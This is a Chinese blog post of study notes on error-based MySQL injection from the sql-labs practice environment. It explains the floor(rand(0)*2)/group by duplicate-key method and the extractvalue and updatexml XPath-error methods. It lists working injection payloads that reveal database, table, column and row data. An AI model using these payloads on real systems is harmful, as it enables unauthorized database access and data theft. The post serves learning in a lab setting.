<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.4.0">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.15.4/css/all.min.css" integrity="sha256-mUZM63G8m73Mcidfrv5E+Y61y7a12O5mW4ezU3bxqW4=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/animate.css@3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"example.com","root":"/","images":"/images","scheme":"Gemini","darkmode":false,"version":"8.8.1","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12},"copycode":false,"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"}}</script><script src="/js/config.js"></script>
<meta name="description" content="sql报错注入 使用场景:用于没有回显信息时，但有报错信息时使用。  ​     报错注入在没法用union联合查询时用，但前提还是不能过滤一些关键的函数。 报错注入就是利用了数据库的某些机制，人为地制造错误条件，使得查询结果能够出现在错误信息中。这里主要记录一下xpath语法错误和concat+rand()+group_by()导致主键重复 concat+rand()+group by()导致主">
<meta property="og:type" content="article">
<meta property="og:title" content="sql-labs报错注入">
<meta property="og:url" content="http://example.com/2021/10/16/sql-labs%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5/index.html">
<meta property="og:site_name" content="Bai">
<meta property="og:description" content="sql报错注入 使用场景:用于没有回显信息时，但有报错信息时使用。  ​     报错注入在没法用union联合查询时用，但前提还是不能过滤一些关键的函数。 报错注入就是利用了数据库的某些机制，人为地制造错误条件，使得查询结果能够出现在错误信息中。这里主要记录一下xpath语法错误和concat+rand()+group_by()导致主键重复 concat+rand()+group by()导致主">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="c:/Users/夜风/AppData/Roaming/Typora/typora-user-images/image-20211019203424502.png">
<meta property="og:image" content="c:/Users/夜风/AppData/Roaming/Typora/typora-user-images/image-20211019211215828.png">
<meta property="og:image" content="c:/Users/夜风/AppData/Roaming/Typora/typora-user-images/image-20211019211244289.png">
<meta property="og:image" content="https://img2020.cnblogs.com/blog/1743015/202105/1743015-20210517111241925-429837106.png">
<meta property="og:image" content="d:/博客/source/img/t1.png">
<meta property="og:image" content="d:/博客/source/img/t2.png">
<meta property="og:image" content="d:/博客/source/img/t5.png">
<meta property="article:published_time" content="2021-10-16T08:31:46.000Z">
<meta property="article:modified_time" content="2021-11-15T08:27:28.134Z">
<meta property="article:author" content="JIE">
<meta property="article:tag" content="sql报错注入">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="c:/Users/夜风/AppData/Roaming/Typora/typora-user-images/image-20211019203424502.png">


<link rel="canonical" href="http://example.com/2021/10/16/sql-labs%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5/">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"http://example.com/2021/10/16/sql-labs%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5/","path":"2021/10/16/sql-labs报错注入/","title":"sql-labs报错注入"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>sql-labs报错注入 | Bai</title>
  




  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
<link rel="alternate" href="/atom.xml" title="Bai" type="application/atom+xml">
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <h1 class="site-title">Bai</h1>
      <i class="logo-line"></i>
    </a>
      <p class="site-subtitle" itemprop="description">记录学习的思考</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu">
        <li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a></li>
        <li class="menu-item menu-item-about"><a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a></li>
        <li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a></li>
        <li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a></li>
        <li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a></li>
  </ul>
</nav>




</div>
        
  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>

  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#sql%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5"><span class="nav-number">1.</span> <span class="nav-text">sql报错注入</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#concat-rand-group-by-%E5%AF%BC%E8%87%B4%E4%B8%BB%E9%94%AE%E9%87%8D%E5%A4%8D"><span class="nav-number">1.1.</span> <span class="nav-text">concat+rand()+group by()导致主键重复</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#group-by"><span class="nav-number">1.1.1.</span> <span class="nav-text">group by</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#extractvalue%E5%87%BD%E6%95%B0"><span class="nav-number">2.</span> <span class="nav-text">extractvalue函数</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#updatexml"><span class="nav-number">3.</span> <span class="nav-text">updatexml</span></a></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author site-overview-item animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">JIE</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap site-overview-item animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">19</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
        <span class="site-state-item-count">11</span>
        <span class="site-state-item-name">标签</span>
      </div>
  </nav>
</div>
  <div class="links-of-author site-overview-item animated">
      <span class="links-of-author-item">
        <a href="/atom.xml" title="RSS → &#x2F;atom.xml">RSS</a>
      </span>
  </div>



        </div>
      </div>
    </div>
  </aside>
  <div class="sidebar-dimmer"></div>


    </header>

    
  <div class="back-to-top" role="button" aria-label="返回顶部">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2021/10/16/sql-labs%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="JIE">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Bai">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          sql-labs报错注入
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>

      <time title="创建时间：2021-10-16 16:31:46" itemprop="dateCreated datePublished" datetime="2021-10-16T16:31:46+08:00">2021-10-16</time>
    </span>
      <span class="post-meta-item">
        <span class="post-meta-item-icon">
          <i class="far fa-calendar-check"></i>
        </span>
        <span class="post-meta-item-text">更新于</span>
        <time title="修改时间：2021-11-15 16:27:28" itemprop="dateModified" datetime="2021-11-15T16:27:28+08:00">2021-11-15</time>
      </span>

  
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">
        <h2 id="sql报错注入"><a href="#sql报错注入" class="headerlink" title="sql报错注入"></a>sql报错注入</h2><pre><code> 使用场景:用于没有回显信息时，但有报错信息时使用。
</code></pre>
<p>​     报错注入在没法用union联合查询时用，但前提还是不能过滤一些关键的函数。</p>
<p>报错注入就是利用了数据库的某些机制，人为地制造错误条件，使得查询结果能够出现在错误信息中。这里主要记录一下<code>xpath语法错误</code>和<code>concat+rand()+group_by()导致主键重复</code></p>
<h3 id="concat-rand-group-by-导致主键重复"><a href="#concat-rand-group-by-导致主键重复" class="headerlink" title="concat+rand()+group by()导致主键重复"></a>concat+rand()+group by()导致主键重复</h3><p>该方法的关键在于group by</p>
<h4 id="group-by"><a href="#group-by" class="headerlink" title="group by"></a>group by</h4><p>GROUP BY 语句根据一个或多个列对结果集进行分组。</p>
<p>group by 语句形成的字段是主键</p>
<p><code>主键定义</code></p>
<ul>
<li><p><code>每个表只能定义一个主键。</code></p>
</li>
<li><p><code>主键值必须唯一标识表中的每一行，且不能为 NULL，即表中不可能存在有相同主键值的两行数据。这是唯一性原则。</code></p>
</li>
<li><p><code>一个字段名只能在联合主键字段表中出现一次。</code></p>
</li>
<li><p><code>联合主键不能包含不必要的多余字段。当把联合主键的某一字段删除后，如果剩下的字段构成的主键仍然满足唯一性原则，那么这个联合主键是不正确的。这是最小化原则。</code></p>
<p>而我这次报错注入利用的原理就是这个。</p>
<p>利用主键的行名无法重复，如果重复系统会报错出重复的行名</p>
<p>我们可以利用这个方法把需要的信息通过报错显示出来。</p>
<p>可以用insert 来测试。</p>
<p><img src="C:\Users\夜风\AppData\Roaming\Typora\typora-user-images\image-20211019203424502.png" alt="image-20211019203424502"></p>
</li>
</ul>
<p>使用group by语句时和count()函数，mysql数据库会先建立一个虚拟表，当查询到新的键不在虚拟表中，数据库就会将其插入表中，如果数据库中已经存在该键，则找到该键对应的计数字段并加一，group by语句会执行两次语句，一次在检测的时候，一次在插入的时候。（sql报错注入group by语句和count()函数需要一起使用才会报错   ps我还不知道为什么，我觉的是因为count()函数）</p>
<p>由于我们使用了rand(0)，在查询虚拟表之前先执行一下rand(0),第一次的到的结果为0，发现虚拟表中没有，所以此时插入键0，而在插入时，rand(0)函数会再执行一次，而此时查询的结果为1。所以实际插入进去的键名是1。第二次插入时，执行rand(0)函数，得到的结果为1，发现为1，不会插入函数（group by语句只会再插入时再执行一次语句），所以这次没有插入，只是找到该键对应的计数字段并加一，第三次插入时，执行rand(0),而此时查询的结果为0，查询虚拟表发现没有，进行插入，而再插入时会再执行rand(0),导致0变1，这就会于原先虚拟表中的1键名重复，此时报错出重复的键名。</p>
<p>(rand(0)于rand()不同出就是rand(0)每次执行的结果都是一样的，rand()不是)</p>
<p><img src="C:\Users\夜风\AppData\Roaming\Typora\typora-user-images\image-20211019211215828.png" alt="image-20211019211215828"></p>
<p><img src="C:\Users\夜风\AppData\Roaming\Typora\typora-user-images\image-20211019211244289.png" alt="image-20211019211244289"></p>
<p>rand()：</p>
<p><code>生成0~1之间的随机数，可以给定一个随机数的种子，对于每一个给定的种子，rand()函数都会产生一系列可以复现的数字</code></p>
<p>floor()：</p>
<p><code>对任意正或者负的十进制值向下取整</code></p>
<p><code>通常利用这两个函数的方法是floor(rand(0))*2 ,其会生成0和1两个数</code></p>
<p>通用公式</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">`select count(*),concat((要查询的语句),floor(rand(0)*2)) as a from information_schema.tables  group by a`</span><br></pre></td></tr></table></figure>



<h2 id="extractvalue函数"><a href="#extractvalue函数" class="headerlink" title="extractvalue函数"></a>extractvalue函数</h2><p>函数原型：extractvalue(xml_document,Xpath_string)<br>正常语法：extractvalue(xml_document,Xpath_string);<br>第一个参数：xml_document是string格式，为xml文档对象的名称<br>第二个参数：Xpath_string是xpath格式的字符串<br>作用：从目标xml中返回包含所查询值的字符串</p>
<p>第二个参数是要求符合xpath语法的字符串，如果不满足要求，则会报错，并且将查询结果放在报错信息里，因此可以利用。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">pyload：id=&#x27;and(select extractvalue(&quot;anything&quot;,concat(&#x27;~&#x27;,(select语句))))</span><br></pre></td></tr></table></figure>

<p>例如：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">`id=&#x27;and(select extractvalue(1,concat(&#x27;~&#x27;,(select database()))))`</span><br><span class="line">`id=&#x27;and(select extractvalue(1,concat(0x7e,@@version)))`</span><br></pre></td></tr></table></figure>

<p>针对mysql数据库：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">`查数据库名：id=&#x27;and(select extractvalue(1,concat(0x7e,(select database()))))`</span><br><span class="line">`爆表名：id=&#x27;and(select extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))))`</span><br><span class="line">`爆字段名：id=&#x27;and(select extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=&quot;TABLE_NAME&quot;))))`</span><br><span class="line">`爆数据：id=&#x27;and(select extractvalue(1,concat(0x7e,(select group_concat(COIUMN_NAME) from TABLE_NAME))))`</span><br></pre></td></tr></table></figure>

<p>注：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">① 0x7e=’~’</span><br><span class="line"> ② concat(‘a’,‘b’)=“ab”</span><br><span class="line"> ③ version()=@@version</span><br><span class="line"> ④ ‘~‘可以换成’#’、’$&#x27;等不满足xpath格式的字符</span><br><span class="line"> ⑤ extractvalue()能查询字符串的最大长度为32，如果我们想要的结果超过32，就要用substring()函数截取或limit分页，一次查看最多32位</span><br></pre></td></tr></table></figure>


<h2 id="updatexml"><a href="#updatexml" class="headerlink" title="updatexml"></a>updatexml</h2><p><code>函数原型：updatexml(xml_document,xpath_string,new_value)</code><br><code>正常语法：updatexml(xml_document,xpath_string,new_value)</code><br><code>第一个参数：xml_document是string格式，为xml文档对象的名称 第二个参数：xpath_string是xpath格式的字符串</code><br>`第三个参数：new_value是string格式，替换查找到的负荷条件的数据 作用：改变文档中符合条件的节点的值``</p>
<p>第二个参数跟extractvalue函数的第二个参数一样，因此也可以利用，且利用方式相同<br>payload：id=’and(select updatexml(“anything”,concat(‘~’,(select语句())),”anything”))</p>
<p>例如：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">`&#x27;and(select updatexml(1,concat(&#x27;~&#x27;,(select database())),1))`</span><br><span class="line">`&#x27;and(select updatexml(1,concat(0x7e,@@database),1))`</span><br></pre></td></tr></table></figure>

<p>同样，针对mysql：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">`爆数据库名：&#x27;and(select updatexml(1,concat(0x7e,(select database())),0x7e))`</span><br><span class="line">`爆表名：&#x27;and(select updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema=database())),0x7e))`</span><br><span class="line">`爆列名：&#x27;and(select updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_name=&quot;TABLE_NAME&quot;)),0x7e))`</span><br><span class="line">`爆数据：&#x27;and(select updatexml(1,concat(0x7e,(select group_concat(COLUMN_NAME)from TABLE_NAME)),0x7e))`</span><br></pre></td></tr></table></figure>





<p>关于为id=1 and （）这个格式的思考</p>
<p>我们知道只有and前后的条件都为真的时候，数据库才会输出结果。</p>
<p>（），但select语句放于（）中时，mysql会优先执行括号内的select语句</p>
<p>首先我们先来看一下select语句的底层执行顺序</p>
<p><img src="https://img2020.cnblogs.com/blog/1743015/202105/1743015-20210517111241925-429837106.png"></p>
<p>当select语句在括号中时语句会有些执行括号select，之后括号中的select返回结果，符号where的语法格式</p>
<p>而没有括号的select就会在词法分析器那边发生错误，因为where是不允许使用这样的语法格式</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">where语法格式如下：</span><br><span class="line"></span><br><span class="line">WHERE &lt;查询条件&gt; &#123;&lt;判定运算1&gt;，&lt;判定运算2&gt;，…&#125;</span><br></pre></td></tr></table></figure>

<p><img src="D:\博客\source\img\t1.png"></p>
<p><img src="D:\博客\source\img\t2.png"></p>
<p>我突然发现了一个更简洁的方法</p>
<p><img src="D:\博客\source\img\t5.png"></p>
<p>说明and后面加select是因为不能出现两个select</p>
<p>而直接跟我们需要的函数是符合语法的</p>
<p>其实我还有问题没想明白</p>
<p>等我想明白再说把</p>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/sql%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5/" rel="tag"># sql报错注入</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2021/10/12/sqlilab1-4/" rel="prev" title="sqlilab1-4">
                  <i class="fa fa-chevron-left"></i> sqlilab1-4
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2021/10/20/sql%E6%97%B6%E9%97%B4%E7%9B%B2%E6%B3%A8/" rel="next" title="sql时间盲注">
                  sql时间盲注 <i class="fa fa-chevron-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">


<div class="copyright">
  &copy; 
  <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">JIE</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

    </div>
  </footer>

  
  <script src="https://cdn.jsdelivr.net/npm/animejs@3.2.1/lib/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/next-boot.js"></script>

  





  





</body>
</html>
